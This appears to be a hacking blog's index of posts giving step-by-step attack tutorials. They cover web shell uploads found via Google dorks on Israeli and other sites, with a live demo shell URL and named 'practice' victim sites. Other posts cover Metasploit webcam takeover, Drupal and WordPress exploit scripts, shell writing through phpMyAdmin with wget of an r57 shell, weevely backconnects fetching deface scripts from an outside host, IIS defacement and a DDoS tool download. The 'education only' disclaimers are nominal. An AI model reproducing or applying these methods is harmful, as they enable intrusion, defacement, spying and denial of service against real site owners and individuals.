Israel Private 0Day Shell Upload Exploits ASP|PHP

Israel Private 0Day Shell Upload Exploits ASP|PHP: Hey Guyz ..Today I found some FRESH Private Israel 0Day Exploits . So i thought of sharing with you all....So lets Start....

Israel Private 0Day Shell Upload Exploits ASP|PHP

1). First 0Day Shell Upload ASP | PHP

# Google Dork -|-

'prod1.aspx?pid=' site:il or You can also create your own Dork

# Exploit Upload 1 -|-
/admin/adminbanners.aspx

# Exploit Upload 2 -|- 
/admin/AdminPics.aspx

When you upload your asp or php shell just Check Code Source of the page you will see your url Shell example: /banners/1a62aa_bddf_4e3d_8464_f0f62ac8c7.asp

# DEMO SHELL -|- 
http://littlebags.co.il/banners/1dea62aa_bddf_4e3d_8464_f640f62ac8c7.asp

Israel Private 0Day Shell Upload Exploits ASP|PHP

2). Second 0day Upload

# Dork -|- 
inurl:/index.php?categoryID= site:il
inurl:/index.php?ukey=auth
inurl:/index.php?ukey=feedback
inurl:/index.php?ukey=pricelist
inurl:/index.php?ukey=auxpage_faq
inurl:/shop/index.php?categoryID=
inurl:ukey=product&productID=

# Exploit -|-
/published/common/html/xinha/plugins/ImageManager/manager.php

‪#‎Exploit‬ -|-
/published/common/html/xinha/plugins/ExtendedFileManager/manager.php

Israel Private 0Day Shell Upload Exploits ASP|PHP

3). Third 0day Upload Blind Sql Injection

 This just Targets with havij or manually and admin page of the script is www.target.co.il/QAdmin

# Dork -|- 

intext:cybercity site:il
inurl:index.php?id= <-- Page 4
intext:medicine site:il
inurl:index.php?id= <-- page 2

So thats it guys we have seen  Israel Private 0Day Shell Upload Exploits ASP|PHP shre it :)

Read more

How To Upload Shell in Joomla Via Admin Panel

Hello Guys! Successfully Hacked into Joomla Admin Panel? Not sure how to upload shell in jooma via admin panel? well your are at right place because today we are talking about How To Upload Shell in Joomla Via Admin Panel. Today I'm going t teach you How To Upload Shell in Joomla Via Admin Panel. Its pretty simple! just follow the following steps given below  :) :-

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

How To Upload Shell in Joomla Via Admin Panel:

Suppose we have an access to joomla admin. Now just login into it..

Once you Login you see the below screen.

Then look for Extensions and in that Template Manager.

Once you click on that you will see all the templates installed on that site.

See the marking in red it has the star. It means its the default template used by the sites currently. Select any of the template like it did beez in green.

Once you click on beez you will see the following screen. now just click on edit html

Once you click on edit html you will see the following screen

see the red part /templates/beez/index.php that is the path of your shell

Now just paste your shell code over their and save it

Once you click on save. it will take you to page were it will show you Template source saved. you work is done..

Once that is done you can access your shell. Path of the shell would be

www.site.com/templates/beez/index.php

Read more

ULTIMATE EXPLOIT PACK

The ULTIMATE EXPLOIT PACK v5.03

Credits to JUAN SACCO for completing the compression and compilation of this tool !!
ULTIMATE EXPLOIT PACK 5

ULTIMATE Exploit Pack utilizes a propelled programming characterized interface that upholds quick reconfiguration to adjust exploitation codes to the always advancing risk environment. Our innovations permit you to quickly tests and safeguard your border against threatening remote targets.



We enhance ULTIMATE Exploit Pack code  on a consistent basis and our Tech  group is really great about keeping the code stable, yet it is not slug verification (bullet proof). Along these lines, utilizing the most recent stable code is a protected and simple approach to access the new components as we're included.

DOWNLOAD FREE ULTIMATE EXPLOIT PACK 5

If you like it you can consider ......

DOWNLOADING ULTIMATE EXPLOIT PACK 5 Premium 

DOWNLOADING ULTIMATE EXPLOIT PACK 5 Professional 

Install Notes

Installation notes:

For Windows:

Download and install Java 8 from Oracle:

Windows Java SE Java 8 for 32 bits or Java 8 for 64 bits 

After you have installed Java 8 in your machine, double click ExplotPack.jar or from a console run this command: "java -jar ExploitPack.jar"

For Linux:

Under any Linux distribution that supports DEB packages like Ubuntu, Debian, Kali, etc. you can run the following commands to install Java 8 from an official repository 

Copy and paste the following in a terminal window:

echo "deb http://ppa.launchpad.net/webupd8team/java/ubuntu trusty main" >> /etc/apt/sources.list

echo "deb-src http://ppa.launchpad.net/webupd8team/java/ubuntu precise main" >> /etc/apt/sources.list

sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys EEA14886

sudo apt-get update

sudo apt-get install oracle-java8-installer

For OSX:

Download and install Java 8 for OSX 32/64 bits from Oracle: OSX Java 8 32/64 bits

After you have Java 8 installed in your Mac, double click ExploitPack.jar to run it or from a console: "java -jar ExploitPack.jar"

Known issues:

Using Exploit Pack could produce addiction

Prolonged periods of time using this tool could produce network mayhem or even dead

In case of intoxication ( using Exploit Pack under Windows ) please call your doctor immediately.

Subscribe To Juan Sacco YouTube Channel 

Comment below on any issues or questions you want to ask 

Read more

How to Hack WebCam using Metasploit(Kali Linux/ Backtrack)

How to hack WebCam using Metasploit(Kali Linux/ Backtrack)

{How to Hack WebCam using Metasploit(Kali Linux/ Backtrack). So today we are going to learn about How to Hack WebCam using Metasploit(Kali Linux/ Backtrack). I will teach you how you guys can easily Hack WebCam using Metasploit(Kali Linux/ Backtrack). All you need is linux based OS and Metasploit.

Requirements:

• Backtrack or Kali Linux if you don't have download them from below :
  
  Download Kali linuxDownload Backtrack Linux.
• Metasploit, you will need this which is important actually it's pre-installed in backtrack or Kali but some of you  don't have it in your backtrack or Kali so you can download them from here.
  
  DOWNLOAD METASPLOIT [ LINUX ].
  DOWNLOAD METASPLOIT [ WINDOWS ].

How to Hack WebCam using Metasploit(Kali Linux/ Backtrack)

How to Hack WebCam using Metasploit(Kali Linux/ Backtrack). Our main reason for this tutorial is to indicate exactly how simple it is, so you will take better mindfulness that it is possible, and take security and protect yourself. So lets get started: How to Hack WebCam using Metasploit(Kali Linux/ Backtrack)

Open Metasploit And write the following commands step by step :)

• msf> show exploits
• msf> use windows/browser/adobe_cooltype_sing
• msf exploit(adobe_cooltype_sing)> set payload windows/meterpreter/reverse_tcp
• payload=> windows/meterpreter/reverse_tcp
• msf exploit(adobe_cooltype_sing) > show options
  
  

  

  Windows Platform Testing

• msf exploit(adobe_cooltype_sing) > set SRVHOST 192.168.0.58
• SRVHOST => 192.168.0.58
• msf exploit(adobe_cooltype_sing) > set SRVPORT 80
• SRVPORT => 80
• msf exploit(adobe_cooltype_sing) > set uripath /
• uripath => /
• msf exploit(adobe_cooltype_sing) > set uripath /
• uripath => /
• msf exploit(adobe_cooltype_sing) >exploit -j
• Let the victim open your IP in their (his/her)  browser and when it will be opened, you will get 1 meterpreter session.
• msf exploit(adobe_cooltype_sing) > session -i 1
• meterpreter> run webcam  
• And you will get access to the webcam of the targeted victim .
• Congratulations you did it :D !!

How to Hack WebCam using Metasploit(Kali Linux/ Backtrack)

I hope you got everything. My next tutorial will be about Using Metasploit to Hack an Android Phone. STAY CONNECTED ;)

If you have any queries fell free to comment below.

Read more

Drupal 7.xx SQL Injection Exploit

Drupal 7.xx SQL Injection Vulnerability
This exploit add a new Drupal administrator account (preserving original) via Sql Injection.

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Requirements:-

1). Python

2). Exploit Script.py

         OR

3). Drupal Auto Exploiter

In this tutorial, i'm just going to show you how to exploit using our Drupal Auto Exploiter since it is fast and easy.

Steps:-

1). Download the auto exploiter from the given link
2). Extract and run it
3).  Find your target on Google by using this dork

intext:"powered by drupal"

4). Choose any site, paste it in exploiter and click EXPLOIT
5). If the site is vulnerable, you will see something like this

6). Click the given login URL and login with the username and password given.

Having Problems?

Feel free to read the Frequent Asked Questions(FAQs) by clicking on HELP

Downloads:-

Python

Exploit Script.py

Drupal AutoExploiter

Read more

Wordpress Exploit: WPDataTable Unauthenticated Shell Upload Vulnerability and Not Acceptable Bypass

Exploit Wordpress: WPDataTable Unauthenticated Shell Upload Vulnerability and Not Acceptable Bypass 

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Uploading Shell

Requirement:
    1-Python Any Version (v2.7 recommended)
    2-Exploit Script
    3-Backdoor

Steps:
    1- Download Exploit

        wget http://www.homelab.it/wp-content/uploads/2014/11/wpdatatables_shell_up.py_.txt

    2- Change to executable Python extension

        mv wpdatatables_shell_up.py_.txt wpdatatables_shell_up.py

    3- Find Vulnerable Target using dork

        inurl:/plugins/wpdatatables
        inurl:codecanyon-3958969
        index of "wpdatatables"
        index of "codecanyon-3958969"

    4- Open cmd/terminal and run exploit wptable.py

        python wpdatatables_shell_up.py -t targetsite.com -f shell.php

    5- Shell Upload to

        http://targetsite.com/wp-content/YEAR/MONTH/shell.php

Bypassing Not Acceptable:-

Requirements:
    1- Weevely Stealth Shell
    2- Remote Deface Script (.txt)


Steps:
    1- Upload weevely stealth shell using the exploit script

    2- Backconnect using weevely

    3- CD to root directory

    4- Backup index.php

        mv index.php indexBAK.php

    5- Import Deface Script

        wget http://yourhosting.com/index.txt -O index.php

Read more

Hack Web Sites Using IIS Exploit [For XP Users]

Hello Readers, I heard some of you are not getting out tutorials because u have no knowledge about Web hacking and you wanna learn web hacking .. So today i decided to write this tutorial for no0bs.

Because in this tutorial we are going to learn about IIS Web Hacking Exploit the Easiest way to hack for Noobs..

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

By using this Exploit an attacker can upload shell , Deface web site delete data etc. etc can do every thing without login..:D . Yeah you heard Right.. I know you all are getting exited, So lets's start :-

Note:- this is only for Windows XP users. For Windows 7 user , i will post soon ...

Follow the Instructions:-

1). First Of all we need to find Vulnerable site. Go to google and type the following dork:-

Dork- Intext:"Powered by IIS

Actually there is no particular dork be Creative use mind and create your own unique dork :) ..

If you are unable to find Don't worry ..See the end of the tutorial i have posted some sites :)

2). After Finding Vuln Site .Click on Start button And open "RUN"

3). Now type the following code in "RUN"

%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}

4). Now a FOlder will open named "Web Folders"

Now Right Click in that folder then "New" And then  "Web Folder"..

5). Now paste the url of the Vulnerable site And CLick Next..

6). Now it will ask you to give Name for that Web Folder leave as it is Click Finish..

7). Congratulations! Now you are in the web site..If you wanna upload shell copy your Shell.php in to that folder and your shell will be uploded.. to path

Example : site.com/shell.php

Do the same to upload your deface also :D

Here are some site For Practicing ....  
http://www.houtai123.cn/
http://news.rhvacnet.com/
http://israelshamir.net/
http://intellectual.members.easyspace.com/
http://hoodstarsports.com/
http://jennylo.co.uk/
http://hurrelvisualarts.com/

Soon i will post list of Vuln. sites of IIS Exploit/....

Read more

Upload Shell And Deface Via PhpmyAdmin

Earlier I have posted About How to get Acess to PhpmyAdmin without login through google dorks. As i promised I will post about how to deface using PhpmyAdmin. So here it is Lets start...
NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Requirements(All You Need):-
-You must have the full path 

- pma & mysql db privileges. 

Follow the Instructions:-

1). First login in to mysql. Or you can use these dorks also CLICK HERE.

2). Now click 'Show MySQL system varible" then 'SQL' . Now you can run sql commands,like create db, delete tables or whatever. We want to upload shell so lets move on to it. 

3). Now we will create a cmd line into a new file,with select into. SELECT "" INTO OUTFILE "full/path/here/cmd.php" and click 'Go'. 

4). Now, the cmd line is here http://site.com/cmd.php lets run the command to get shell. wget http://www.r57.biz /r57.txt;mv r57.txt shell.php. Thats all then we av the shell on the site!!..!

Read more

PhpmyAdmin Exploit with Google Dorks

Hello Reader! Today Im going to show you how to exploit PHPmyAdmin with google Dorks. You dont nedd to do any thing no login nothing just put the dork and open any site you will directly go to PHPmyAdmin :).. So let's Start...

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Follow the Instructions:-
1). Enter the following Dork in Google.

Dork: allinurl:index.php?db=information_schema

2). It will show you about 80,800 Results. So now you can guess how many Vuln  sites are there :D..Open any site you will redirect to PHPmyAdmin...:D

This dork bypasses the admin username and pass and takes You directly to information schema tables to get data and You can delete data

Learn To Deface VIA PhpmyAdmin:-
How to deface using PHPmyAdmin..

Hope you all are enjoying my blog posts...If you like our tutorials please leave valuable comments ...

Read more

PHP Dos/DDoS Script (Dos Attack Tool)

Hello Readers, Today Im going to share a amazing PHP tool with you. This is one of the advanced tool of website crashing known as PHP Dos Attack Script. Simply download the file, unzip and upload the files to your web host.

FUNCTIONS:-

ddos script,php dos,php ddos script,php dos script,ddos php script,ddos php script,mysql ddos
ddos script php,phpDos,ddos scripts,script DDOS,php ddos,ddos php,denial of service script
dos php,ddos attack script,php ddoser,script php ddos,dos php script,php script ddos
php DDos attack script,script ddos php,PHP DoS Script by Exe,ddos,php dos by exe,ddos script

DENIAL OF SERVICE :-

php script,php ddos attack,php ddos download,download script ddos,ddos online
denial of service scripts,PHP DoS/DDoS (Denial Of Service) Script,ddos php tool
php curl ddos,ddos php scripts,script ddos attack,dos script denial,
php Dos scripts,php denial of service

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Full PHP-DOS-ATTACKER script including:

1). index.php
2). functions.php
3). main.jpg

Information provided on this blog is for purposes only!The author should not be held responsible! Use content and tools on this blog/site is your own RISK!!  

Download(MediaFire):-

http://sh.st/wiUmd

Password: hackers-store.blogspot.com

Read more